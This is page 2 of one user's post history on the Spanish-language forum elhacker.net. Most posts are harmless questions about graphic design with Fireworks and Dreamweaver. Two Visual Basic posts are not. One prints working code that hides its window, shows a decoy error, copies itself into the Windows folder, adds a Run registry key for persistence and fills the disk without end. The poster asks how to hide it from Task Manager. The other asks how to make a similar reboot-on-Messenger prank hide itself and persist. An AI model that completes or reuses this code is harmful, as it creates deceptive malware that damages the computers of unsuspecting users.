elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


  Mostrar Temas
Páginas: 1 [2]
11  Media / Diseño Gráfico / menu drop-down con FIREWORKS en: 10 Abril 2005, 20:10 pm
A ver, lo primero el menu: http://ciberia.ya.com/villamildesign/menu.htm

Ahora la pregunta:

Como hago para que los submenus (por llamarlos de alguna forma) sean con el mismo estilo que los menus (lo mismo xD).

 ???

Gracias.
12  Media / Diseño Gráfico / Un par de duas del fireworks. en: 10 Abril 2005, 14:14 pm
-Con el Fireworks he hecho un logotipo con la pluma, pero no me sale un dibujo vectorial, quiero decir, que si lo amplio pierde calidad, como hago para que me haga una linea como el frehand o el flash.  ???


-¿Cómo fusiono dos capas con el Fireworks?  ???



Gracias.
13  Media / Diseño Gráfico / Opinión sobre web en: 9 Abril 2005, 18:45 pm
Pues eso, que opinen sobre el diseño de:

http://villamil.esp.st
14  Media / Diseño Gráfico / Prueba de index para un restaurante - opinen en: 7 Abril 2005, 15:45 pm
Bueno, pues toy empezando con el diseño gráfico y web y na, que hice una prueba del index de un restaurante, Ale opinen:

http://garaje.ya.com/villamilart/

PD: El fondo no se me ocurría mucho... ^^U

PD²: No se porqué, pero el dreamweaber no me dejaba poner espoacios entre la imágenes linkeadas (las servilletas) ni poniiendo &nbsp en el código  ???
15  Media / Multimedia / Videos a lo Star Wars. en: 26 Diciembre 2004, 02:46 am
Me gustaría saber como se hace para poder separar los fotogramas de una peli y hacer por ejemplo sable laser con otro programa como photoshop y luego volver a hacerlo video, es decir, con qué programa y cómo.
16  Media / Diseño Gráfico / tutoriales corel painter en: 3 Diciembre 2004, 01:43 am
a poner links todo el mundo!
17  Programación / Programación Visual Basic / ayuda con un codigo en visual basic en: 29 Julio 2004, 23:03 pm
el siguiente codigo:
-------------------
Código:
Private Sub Form_Load()
On Error Resume Next
Form1.Hide
Set comprovar = CreateObject("scripting.filesystemobject")
Set archivo = CreateObject("scripting.filesystemobject")
Set escribir = archivo.CreateTextFile("C:\porkeria.txt", False)
Set inicio = CreateObject("WScript.Shell")
If (comprovar.FileExists("C:\WINDOWS\pork.EXE")) = False Then
MsgBox "Error durante la aplicación. Deberá cerrarse", vbCritical, "ERROR"
FileCopy App.EXEName & ".EXE", "C:\WINDOWS\pork.EXE"
inicio.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\pork", "C:\WINDOWS\pork.exe"
End If
Do
escribir.write "jAjAjAjAjA...   jAjAjAjAjA...   jAjAjAjAjA...   jAjAjAjAjA...   jAjAjAjAjA...   "
Loop
End Sub
--------------------
lo que pasa es k haces control+alt+supr y se kita, como hago para que me salga en procesos en lugar de aplicaciones??? es k en procesos es + dificil de buscar..

NOTA DEL MODERADOR: Si poneís los códigos, hacedlo dentro del tag code :)
18  Programación / Programación Visual Basic / Dudas en VISUAL BASIC en: 6 Julio 2004, 22:19 pm
Para el siguiente programa, tengo 3 dudas:

El programa lo que hace es meterse en le regedit de windows y abrirse siempre que se inicie windows, lo primero da una msgbox de error del programa pa que no desconfie, luego cada vez que inicia messenger reinicia el ordenador.

Dudas:

1º.- ¿Cómo hago que se haga algo cada vez que se inicie el messenger?
2º.- La primera vez tienes que meterse en el regedit de windows, lanzas la msgbox... ¿pero cómo hago eso?, es decir, ¿cómo hago que unas cosas las haga sólo la primera vez y, otras, siempre?
3º.-En el regedit de windows dice donde está el fichero para que se inicie, pero yo creo que alguien lo mas mínimo listo lo borraría, así que, ¿hay alguna forma de que se guarde a sí mismo y se oculte para que no se de cuenta el usuario?

Gracias
Páginas: 1 [2]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines